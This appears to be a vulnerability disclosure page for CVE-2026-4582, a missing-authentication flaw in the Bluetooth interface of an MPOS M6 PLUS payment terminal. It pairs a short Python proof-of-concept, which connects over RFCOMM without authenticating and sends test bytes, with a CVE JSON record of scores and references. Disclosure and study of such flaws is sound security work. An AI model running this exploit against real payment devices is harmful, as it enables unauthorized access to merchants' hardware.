CVE-2026-4582

import bluetooth def exploit_bluetooth_auth_bypass(target_mac): """ PoC for CVE-2026-4582 Attempts to connect to the target MPOS device via Bluetooth exploiting the missing authentication vulnerability. """ port = 1 # Default RFCOMM port print(f"[*] Targeting MAC: {target_mac}") try: # Create a Bluetooth socket sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) # Attempt to connect without authentication # If successful, the vulnerability is confirmed sock.connect((target_mac, port)) print("[+] Connection established! Auth bypass successful.") # Send test data sock.send("\x01\x02\x03") sock.close() return True except Exception as e: print(f"[-] Exploit failed: {e}") return False if __name__ == "__main__": # Replace with the actual MAC address of the vulnerable device TARGET_MAC = "00:11:22:33:44:55" exploit_bluetooth_auth_bypass(TARGET_MAC)

{"cve": {"id": "CVE-2026-4582", "sourceIdentifier": "[email protected]", "published": "2026-03-23T10:16:08.290", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Shenzhen HCC Technology MPOS M6 PLUS 1V.31-N. Affected by this vulnerability is an unknown functionality of the component Bluetooth. Such manipulation leads to missing authentication. The attack must be carried out from within the local network. Attacks of this nature are highly complex. The exploitation appears to be difficult. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en Shenzhen HCC Technology MPOS M6 PLUS 1V.31-N. Afectada por esta vulnerabilidad es una funcionalidad desconocida del componente Bluetooth. Tal manipulación conduce a autenticación faltante. El ataque debe ser llevado a cabo desde dentro de la red local. Ataques de esta naturaleza son altamente complejos. La explotación parece ser difícil. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera. Análisis estadístico dejó claro que VulDB proporciona la mejor calidad para datos de vulnerabilidad."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.2, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/Davim09/m6plusexploit/blob/main/docs/CVE-1-Authentication.md", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/775433", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/352419", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/352419/cti", "source": "[email protected]"}]}}